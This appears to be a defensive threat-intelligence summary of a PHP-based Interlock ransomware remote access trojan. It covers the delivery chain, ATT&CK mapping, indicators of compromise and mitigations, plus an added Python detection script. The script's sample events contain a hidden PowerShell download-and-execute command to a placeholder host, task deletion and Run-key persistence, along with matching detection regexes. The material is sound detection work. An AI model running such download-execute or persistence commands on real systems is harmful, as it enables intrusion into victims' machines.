Full Report
Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group’s remote access trojan (RAT). This new malware, a shift …
Analysis Summary
# Tool/Technique: Interlock RAT (PHP Variant)
## Overview
A new, resilient variant of the Remote Access Trojan (RAT) used by the Interlock ransomware group. This iteration shifts from previous JavaScript/Node.js implementations to utilize PHP, indicating operational evolution, often seen in conjunction with the LandUpdate808 (KongTuke) web-inject threat clusters.
## Technical Details
- Type: Malware family (Remote Access Trojan - RAT)
- Platform: Windows (implied by the use of `powershell.exe` and `schtasks`, and by its targeting of the Windows registry)
- Capabilities: Initial access, system reconnaissance, persistence mechanisms, and execution of further payloads/commands via PowerShell.
- First Seen: June 2025 campaigns.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- TA0007 - Discovery
- T1082 - System Information Discovery
- T1057 - Process Discovery
- T1012 - Query Registry
- T1049 - System Network Connections Discovery
- TA0003 - Persistence
- T1547.001 - Registry Run Keys / Startup Folder
- TA0008 - Lateral Movement
- T1021 - Remote Services
- T1021.001 - Remote Desktop Protocol (RDP)
## Functionality
### Core Capabilities
- **Execution Chain:** Starts from compromised websites with injected scripts that prompt user interaction (a fake CAPTCHA/verification page); that interaction runs obfuscated PowerShell commands which ultimately invoke a locally staged PHP executable (`php.exe` under `AppData\Roaming`).
- **Configuration Loading:** The PHP executable is invoked with specific directives (`-d extension=zip`) and loads a configuration file (`.cfg`).
- **System Discovery (Automated):** Executes extensive PowerShell commands to gather system profile data, including `systeminfo`, running processes/services (`tasklist`, `Get-Service`), mounted drives (`Get-PSDrive`), and network neighborhood data (`Get-NetNeighbor`).
- **Privilege Determination:** Checks local privilege level (USER, ADMIN, or SYSTEM).
### Advanced Features
- **Interactive/Hands-on-Keyboard Discovery:** Commands suggest the RAT supports interactive C2 sessions, potentially for manual discovery beyond automated scripts.
- **Persistence:** Attempts to establish persistence via the Windows Registry Run key (`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`).
- **Lateral Movement:** Observed utilizing Remote Desktop Protocol (RDP) for movement within victim environments.
- **Tool Chaining:** In some observed instances, the PHP variant subsequently deploys the Node.js variant of the Interlock RAT, demonstrating modularity.
- **Payload Delivery Command:** Initial execution involved deleting a scheduled task (`schtasks /delete /tn Updater /f`) and then downloading and executing a script via PowerShell's `Net.WebClient` from a specific URL.
## Indicators of Compromise
- File Hashes:
- SHA256: `28a9982cf2b4fc53a1545b6ed0d0c1788ca9369a847750f5652ffa0ca7f7b7d3` (Config File)
- SHA256: `8afd6c0636c5d70ac0622396268786190a428635e9cf28ab23add939377727b0` (Config File)
- File Names:
- Configuration files named `wefs.cfg` are potentially referenced, alongside a generic `config.cfg`.
- The PHP executable is staged in `C:\Users\[REDACTED]\AppData\Roaming\php\php.exe`.
- Registry Keys:
- Persistence Registry Entry Example: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` targeting the staged `php.exe`.
- Network Indicators:
- C2 Domains (TryCloudflare hosted):
- `deadly-programming-attorneys-our[.]trycloudflare[.]com` (Used in initial download via PowerShell URI)
- Fallback IPs:
- `64[.]95[.]12[.]71`
- `184[.]95[.]51[.]165`
- Behavioral Indicators:
- Spawning of `php.exe` from an unusual location (`AppData\Roaming`).
- Use of PowerShell (`-ep Bypass -w H`) to execute remote content (`| iex`).
- Execution of multiple PowerShell cmdlets for system discovery via `cmd.exe /s /c "powershell -c ..."`.
## Associated Threat Actors
- Interlock Ransomware Group
- Associated with LandUpdate808 (KongTuke) web-inject activity.
## Detection Methods
- Signature-based detection: YARA rules are available via The DFIR Report Intel platform (for registered customers).
- Behavioral detection: Monitor for PowerShell executed with common obfuscation or download/execute patterns, especially where it spawns processes such as `php.exe` from non-standard directories. Also detect suspicious scheduled task and registry modifications (`schtasks /delete`, Run key creation).
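The behavioral indicators and detection methods above, expressed as matching logic over Sysmon-style process-creation and registry events. This is an added example, not code from The DFIR Report or the original page; the sample events, user name, and URL are constructed placeholders.

```python
import re

# Constructed sample telemetry (Sysmon-style process and registry events).
# Not taken from the report; user name, URL and value name are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell -ep Bypass -w H -c "(New-Object Net.WebClient).DownloadString(\"https://placeholder.invalid/a\") | iex"'},
    {"type": "process", "image": r"C:\Users\user1\AppData\Roaming\php\php.exe",
     "cmd": r'"C:\Users\user1\AppData\Roaming\php\php.exe" -d extension=zip config.cfg'},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /delete /tn Updater /f"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /s /c "powershell -c Get-NetNeighbor"'},
    {"type": "registry", "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\wefs",
     "details": r"C:\Users\user1\AppData\Roaming\php\php.exe"},
    # Benign control: php.exe from a normal install location should not fire.
    {"type": "process", "image": r"C:\Program Files\PHP\php.exe", "cmd": "php.exe -v"},
]

# php.exe staged under a user profile's AppData\Roaming directory
PHP_FROM_APPDATA = re.compile(r"\\Users\\[^\\]+\\AppData\\Roaming\\.*php\.exe$", re.I)
# PowerShell launched with execution policy bypass and a hidden window
PS_BYPASS_HIDDEN = re.compile(r"-ep\s+Bypass\b.*-w\s+H(idden)?\b", re.I)
# Remote content fetched with Net.WebClient and piped into Invoke-Expression
PS_DOWNLOAD_EXEC = re.compile(r"Net\.WebClient.*\|\s*iex\b", re.I)
SCHTASKS_DELETE = re.compile(r"\bschtasks(\.exe)?\s+/delete\b", re.I)
# Discovery cmdlets wrapped as cmd.exe /s /c "powershell -c ..."
CMD_PS_WRAPPER = re.compile(r'cmd(\.exe)?\s+/s\s+/c\s+"powershell\s+-c', re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)

def classify(event):
    """Return a list of (rule_name, severity) hits for a single event."""
    hits = []
    if event["type"] == "process":
        cmd = event["cmd"]
        if PHP_FROM_APPDATA.search(event["image"]):
            hits.append(("php_exe_from_appdata", "high"))
        if PS_BYPASS_HIDDEN.search(cmd) and PS_DOWNLOAD_EXEC.search(cmd):
            hits.append(("powershell_download_exec", "high"))
        if SCHTASKS_DELETE.search(cmd):
            hits.append(("schtasks_delete", "medium"))
        if CMD_PS_WRAPPER.search(cmd):
            hits.append(("cmd_wrapped_powershell_discovery", "medium"))
    elif event["type"] == "registry":
        # Run-key persistence pointing at the staged php.exe
        if RUN_KEY.search(event["target"]) and PHP_FROM_APPDATA.search(event["details"]):
            hits.append(("run_key_to_appdata_php", "high"))
    return hits

def scan(events):
    """Map event index -> hits, omitting events that matched nothing."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

Running `scan(SAMPLE_EVENTS)` flags the first five constructed events and leaves the benign `php.exe -v` launch unflagged.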
## Mitigation Strategies
- Prevention: Strong web filtering, and ensuring website owners patch the vulnerabilities that enable the initial web-injects (KongTuke).
- Hardening recommendations: Implement application control to restrict executable use from user profile directories like `AppData\Roaming`.
- Network segmentation and monitoring RDP usage for unauthorized access.
- Restrict PowerShell execution policies where possible and monitor command-line arguments for suspicious URI downloads/execution.
## Related Tools/Techniques
- Interlock RAT (Node.js variant, aka NodeSnake)
- KongTuke/LandUpdate808 web-inject delivery mechanism.
- JavaScript-based initial stage malware.